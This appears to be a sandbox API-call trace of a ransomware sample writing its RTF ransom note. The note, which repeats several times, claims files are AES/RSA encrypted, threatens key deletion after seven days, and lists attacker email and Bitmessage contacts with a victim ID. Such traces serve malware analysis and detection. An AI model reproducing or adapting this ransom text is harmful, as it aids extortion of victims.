p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.210] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.211] CloseHandle (hObject=0x2ec) returned 1 [0291.211] GetFileAttributesW 